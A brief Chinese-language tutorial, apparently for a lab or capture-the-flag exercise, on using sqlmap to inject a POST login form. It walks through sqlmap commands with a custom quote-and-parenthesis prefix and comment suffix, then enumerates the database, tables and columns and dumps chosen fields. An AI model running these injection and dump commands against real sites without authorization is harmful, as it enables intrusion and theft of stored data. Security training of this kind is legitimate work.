
下载地址:https://sqlmap.org
用法
sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23"
如果没用data的话,就直接下面命令,并且不需要注入前缀和后缀
Sqlmap.py -u URL/index.php?id=1 --current-db
其中, -u :指定URL,后面跟注入点的地址即可--data :通过POST发送的数据字符串--prefix :自定义注入的字符串的前缀--suffix :自定义注入的字符串的后缀
sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" --current‐db
--current-db :列出当前使用的数据库
sqlmap.py -u "URL" ‐‐data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" -D sql100510018 --tables
-D :指定数据库--tables :对当前数据库中的表进行猜解
sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" -D sql100510018 -T
successful --columns
-T :指定数据表--columns :猜解当前表下的列内容
sqlmap.py -u "URL" --data
"uname=dong&passwd=doong&submit=Submit" --prefix "%22%29" --suffix "%23" -D sql100510018 -T
successful -C "congratulation,overlook" --dump
-T :指定数据表-C 可以跟 --dump 连用,获取指定的字段内容
© 版权声明
本站所有文章禁止转载!
